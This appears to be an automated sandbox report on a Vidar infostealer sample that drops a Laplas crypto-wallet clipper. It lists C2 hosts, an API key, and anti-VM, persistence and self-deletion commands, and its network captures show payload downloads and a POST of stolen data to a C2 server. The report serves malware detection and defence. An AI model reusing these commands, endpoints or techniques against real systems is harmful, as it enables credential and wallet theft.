laplas | f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd | Triage

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
27/04/2023, 15:10 UTC

Sharing

Report Analysis Logs

General

Target

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe
Size

409KB
MD5

67dcf917f9a6c220078f1568833b4b48
SHA1

e58cc6833fa5f1f6b202e384952230ab6e2c2de3
SHA256

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd
SHA512

4feea51c030eede785d96cda851978cd6e159261f90ec87bc5244fdb42399d1afa2f46dde83648fd4468e9c5fe3fc1c64b19b817993c807b4893ba555e07ad15
SSDEEP

6144:isIwtFG/KYG522FbS5hqb46hARH0QgdXFJK5ihlqbafc9qdNwHX1:iMtFG/KvnemLhE0QmF7hlqbmckdNw

Score

10^/10

laplas vidar 78489afd9d9a4747beb445e5fb5b9c96 clipper discovery evasion persistence spyware stealer trojan upx

Malware Config

Extracted

Family

vidar

Version

3.6

Botnet

78489afd9d9a4747beb445e5fb5b9c96

C2

https://steamcommunity.com/profiles/76561199499188534

https://t.me/nutalse

Attributes

profile_id_v2
78489afd9d9a4747beb445e5fb5b9c96
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36

Extracted

Family

laplas

C2

http://89.23.97.128

Attributes

api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	77038356242554738439.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	77038356242554738439.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	77038356242554738439.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Executes dropped EXE 3 IoCs

pid	Process
3108	77038356242554738439.exe
2600	20718684313258139080.exe
3356	ntlhost.exe

Loads dropped DLL 2 IoCs

pid	Process
4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe
4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

resource	yara_rule
behavioral1/files/0x000400000001fca6-240.dat	upx
behavioral1/files/0x000400000001fca6-244.dat	upx
behavioral1/files/0x000400000001fca6-243.dat	upx
behavioral1/memory/2600-248-0x0000000000F80000-0x0000000001DE3000-memory.dmp	upx
behavioral1/memory/2600-249-0x0000000000F80000-0x0000000001DE3000-memory.dmp	upx

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	77038356242554738439.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	77038356242554738439.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3108	77038356242554738439.exe
3356	ntlhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1976	4648	WerFault.exe	84

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
4944	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	39	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe
4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 3108	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	91
PID 4648 wrote to memory of 3108	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	91
PID 4648 wrote to memory of 2600	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	93
PID 4648 wrote to memory of 2600	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	93
PID 2600 wrote to memory of 4680	2600	20718684313258139080.exe	95
PID 2600 wrote to memory of 4680	2600	20718684313258139080.exe	95
PID 4680 wrote to memory of 2308	4680	cmd.exe	96
PID 4680 wrote to memory of 2308	4680	cmd.exe	96
PID 4648 wrote to memory of 1652	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	97
PID 4648 wrote to memory of 1652	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	97
PID 4648 wrote to memory of 1652	4648	f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe	97
PID 1652 wrote to memory of 4944	1652	cmd.exe	100
PID 1652 wrote to memory of 4944	1652	cmd.exe	100
PID 1652 wrote to memory of 4944	1652	cmd.exe	100
PID 3108 wrote to memory of 3356	3108	77038356242554738439.exe	102
PID 3108 wrote to memory of 3356	3108	77038356242554738439.exe	102

C:\Users\Admin\AppData\Local\Temp\f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe
"C:\Users\Admin\AppData\Local\Temp\f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4648
- C:\ProgramData\77038356242554738439.exe
  "C:\ProgramData\77038356242554738439.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  PID:3108
- - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:3356
- C:\ProgramData\20718684313258139080.exe
  "C:\ProgramData\20718684313258139080.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\20718684313258139080.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:2308
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:4944
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 2152
  2⤵
  - Program crash
  PID:1976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4648 -ip 4648
1⤵
PID:4928

Network

DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

t.me

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/nutalse

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

149.154.167.99:443

Request

GET /nutalse HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: t.me

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 27 Apr 2023 15:10:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12334
Connection: keep-alive
Set-Cookie: stel_ssid=ba13a18a4d42b63c80_4740471767649171147; expires=Fri, 28 Apr 2023 15:10:20 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
GET

http://116.203.6.40:131/78489afd9d9a4747beb445e5fb5b9c96

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

116.203.6.40:131

Request

GET /78489afd9d9a4747beb445e5fb5b9c96 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Host: 116.203.6.40:131

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 27 Apr 2023 15:10:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://116.203.6.40:131/datapack.zip

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

116.203.6.40:131

Request

GET /datapack.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Host: 116.203.6.40:131
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 27 Apr 2023 15:10:20 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: "631f30d3-28faef"
Accept-Ranges: bytes
POST

http://116.203.6.40:131/

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

116.203.6.40:131

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7003911969584127
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Host: 116.203.6.40:131
Content-Length: 211017
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 27 Apr 2023 15:10:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
DNS

41.249.124.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.249.124.192.in-addr.arpa

IN PTR

Response

41.249.124.192.in-addr.arpa

IN PTR

cloudproxy10041sucurinet
DNS

40.6.203.116.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.6.203.116.in-addr.arpa

IN PTR

Response

40.6.203.116.in-addr.arpa

IN PTR

static406203116clientsyour-serverde
DNS

40.6.203.116.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.6.203.116.in-addr.arpa

IN PTR

Response

40.6.203.116.in-addr.arpa

IN PTR

static406203116clientsyour-serverde
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

transfer.sh

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

8.8.8.8:53

Request

transfer.sh

IN A

Response

transfer.sh

IN A

144.76.136.153
GET

https://transfer.sh/get/GBuOUI/gekaral.exe

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

144.76.136.153:443

Request

GET /get/GBuOUI/gekaral.exe HTTP/1.1
Host: transfer.sh
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 27 Apr 2023 15:10:27 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 3644928
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="gekaral.exe"
Retry-After: Thu, 27 Apr 2023 17:10:30 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1682608230
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
GET

https://transfer.sh/get/WdRiqa/biden.exe

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

Remote address:

144.76.136.153:443

Request

GET /get/WdRiqa/biden.exe HTTP/1.1
Host: transfer.sh
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 27 Apr 2023 15:10:29 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4514304
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="biden.exe"
Retry-After: Thu, 27 Apr 2023 17:10:30 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 8
X-Ratelimit-Reset: 1682608230
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
DNS

153.136.76.144.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.136.76.144.in-addr.arpa

IN PTR

Response

153.136.76.144.in-addr.arpa

IN PTR

transfersh
DNS

67.55.52.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.55.52.23.in-addr.arpa

IN PTR

Response

67.55.52.23.in-addr.arpa

IN PTR

a23-52-55-67deploystaticakamaitechnologiescom
DNS

176.25.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

176.25.221.88.in-addr.arpa

IN PTR

Response

176.25.221.88.in-addr.arpa

IN PTR

a88-221-25-176deploystaticakamaitechnologiescom
GET

http://89.23.97.128/bot/regex

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/regex HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Apr 2023 15:10:50 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Apr 2023 15:10:50 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://89.23.97.128/bot/regex

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/regex HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Apr 2023 15:11:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Apr 2023 15:11:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
DNS

128.97.23.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

128.97.23.89.in-addr.arpa

IN PTR

Response

149.154.167.99:443

https://t.me/nutalse

tls, http

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

1.5kB
19.4kB
24
20

HTTP Request

GET https://t.me/nutalse

HTTP Response

200
116.203.6.40:131

http://116.203.6.40:131/

http

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

324.2kB
2.8MB
2150
2075

HTTP Request

GET http://116.203.6.40:131/78489afd9d9a4747beb445e5fb5b9c96

HTTP Response

200

HTTP Request

GET http://116.203.6.40:131/datapack.zip

HTTP Response

200

HTTP Request

POST http://116.203.6.40:131/

HTTP Response

200
144.76.136.153:443

https://transfer.sh/get/WdRiqa/biden.exe

tls, http

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

278.4kB
8.4MB
6040
6023

HTTP Request

GET https://transfer.sh/get/GBuOUI/gekaral.exe

HTTP Response

200

HTTP Request

GET https://transfer.sh/get/WdRiqa/biden.exe

HTTP Response

200
52.152.110.14:443

260 B
5
89.23.97.128:80

http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin

http

ntlhost.exe

1.1kB
2.5kB
11
12

HTTP Request

GET http://89.23.97.128/bot/regex

HTTP Response

200

HTTP Request

GET http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin

HTTP Response

200

HTTP Request

GET http://89.23.97.128/bot/regex

HTTP Response

200

HTTP Request

GET http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=ROBKQPFG\Admin

HTTP Response

200
20.42.73.27:443

322 B
7
52.152.110.14:443

260 B
5
8.248.3.254:80

322 B
7
8.248.3.254:80

322 B
7
173.223.113.164:443

322 B
7
52.152.110.14:443

260 B
5
52.152.110.14:443

260 B
5
52.152.110.14:443

260 B
5
52.152.110.14:443

52 B
1

8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

t.me

dns

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

41.249.124.192.in-addr.arpa

dns

73 B
113 B
1
1

DNS Request

41.249.124.192.in-addr.arpa
8.8.8.8:53

40.6.203.116.in-addr.arpa

dns

142 B
254 B
2
2

DNS Request

40.6.203.116.in-addr.arpa

DNS Request

40.6.203.116.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

transfer.sh

dns

f74b85088fe251879fd8a4751c49ecc9f7572b5b28cd5a41f28949e6f8b094bd.exe

57 B
73 B
1
1

DNS Request

transfer.sh

DNS Response

144.76.136.153
8.8.8.8:53

153.136.76.144.in-addr.arpa

dns

73 B
98 B
1
1

DNS Request

153.136.76.144.in-addr.arpa
8.8.8.8:53

67.55.52.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

67.55.52.23.in-addr.arpa
8.8.8.8:53

176.25.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

176.25.221.88.in-addr.arpa
8.8.8.8:53

128.97.23.89.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

128.97.23.89.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

Privilege Escalation

Defense Evasion

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials in Files

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion

Lateral Movement

Collection

Data from Local System

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\20718684313258139080.exe

Filesize
4.3MB

MD5
9abf6a8efa066a03eba449a11cafef79

SHA1
317d75f39958078a9706364e9c73ae3d356c90b4

SHA256
8d0f39e08426bf9e7ebc6d84307f0c725136ab9004093e445811881169b5db29

SHA512
bacdebecc2f3d4c5634d664e702edb90ecbae113ba0a09a162bdbc844d36393dcfa90dad2e56bbdc77c2bb90165c06d56a1bab2a0d370a34fa664b34c79b908a

Download Submit
C:\ProgramData\20718684313258139080.exe

Filesize
4.3MB

MD5
9abf6a8efa066a03eba449a11cafef79

SHA1
317d75f39958078a9706364e9c73ae3d356c90b4

SHA256
8d0f39e08426bf9e7ebc6d84307f0c725136ab9004093e445811881169b5db29

SHA512
bacdebecc2f3d4c5634d664e702edb90ecbae113ba0a09a162bdbc844d36393dcfa90dad2e56bbdc77c2bb90165c06d56a1bab2a0d370a34fa664b34c79b908a

Download Submit
C:\ProgramData\20718684313258139080.exe

Filesize
4.3MB

MD5
9abf6a8efa066a03eba449a11cafef79

SHA1
317d75f39958078a9706364e9c73ae3d356c90b4

SHA256
8d0f39e08426bf9e7ebc6d84307f0c725136ab9004093e445811881169b5db29

SHA512
bacdebecc2f3d4c5634d664e702edb90ecbae113ba0a09a162bdbc844d36393dcfa90dad2e56bbdc77c2bb90165c06d56a1bab2a0d370a34fa664b34c79b908a

Download Submit
C:\ProgramData\77038356242554738439.exe

Filesize
3.5MB

MD5
f5548281bcdcec5c1d151d3417412042

SHA1
be6d9b40b6ede0f3c5582b8f48bde7f44f2ed792

SHA256
3469724e57612ca20c888a5a86719c3e4b6fe71f2cfcfecff2fb3950fd0a32ac

SHA512
387d864aca4be8691c20b0ec4b11906491cdb7b0fc435f59699c0596a47ad086d711ed97c47a611b58adf1096203ab7a488e26c307d885e566f56db6dcecab4c

Download Submit
C:\ProgramData\77038356242554738439.exe

Filesize
3.5MB

MD5
f5548281bcdcec5c1d151d3417412042

SHA1
be6d9b40b6ede0f3c5582b8f48bde7f44f2ed792

SHA256
3469724e57612ca20c888a5a86719c3e4b6fe71f2cfcfecff2fb3950fd0a32ac

SHA512
387d864aca4be8691c20b0ec4b11906491cdb7b0fc435f59699c0596a47ad086d711ed97c47a611b58adf1096203ab7a488e26c307d885e566f56db6dcecab4c

Download Submit
C:\ProgramData\77038356242554738439.exe

Filesize
3.5MB

MD5
f5548281bcdcec5c1d151d3417412042

SHA1
be6d9b40b6ede0f3c5582b8f48bde7f44f2ed792

SHA256
3469724e57612ca20c888a5a86719c3e4b6fe71f2cfcfecff2fb3950fd0a32ac

SHA512
387d864aca4be8691c20b0ec4b11906491cdb7b0fc435f59699c0596a47ad086d711ed97c47a611b58adf1096203ab7a488e26c307d885e566f56db6dcecab4c

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
852.5MB

MD5
b6604c10b63fa02995b8b78300988498

SHA1
26e9e3dc2f2d3a14ddc317f08880b24d0b88f2c7

SHA256
b4e9726d480076a03eb43b28a475a5e0c9ce412015eae1573ba6bcea10f3a5ac

SHA512
e68085f4a91c5c5afaf1b893071744015663649522267333900a1b19fe2eb952c4dc066c5fdd653beb8feb970f49a307bddd41e4a19ace264290d36ed117006d

Download Submit
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
852.5MB

MD5
b6604c10b63fa02995b8b78300988498

SHA1
26e9e3dc2f2d3a14ddc317f08880b24d0b88f2c7

SHA256
b4e9726d480076a03eb43b28a475a5e0c9ce412015eae1573ba6bcea10f3a5ac

SHA512
e68085f4a91c5c5afaf1b893071744015663649522267333900a1b19fe2eb952c4dc066c5fdd653beb8feb970f49a307bddd41e4a19ace264290d36ed117006d

Download Submit
memory/2600-249-0x0000000000F80000-0x0000000001DE3000-memory.dmp

Filesize
14.4MB

Download
memory/2600-248-0x0000000000F80000-0x0000000001DE3000-memory.dmp

Filesize
14.4MB

Download
memory/3108-233-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-241-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-232-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-252-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-245-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-246-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-247-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
memory/3108-238-0x0000000000AD0000-0x0000000001338000-memory.dmp

Filesize
8.4MB

Download
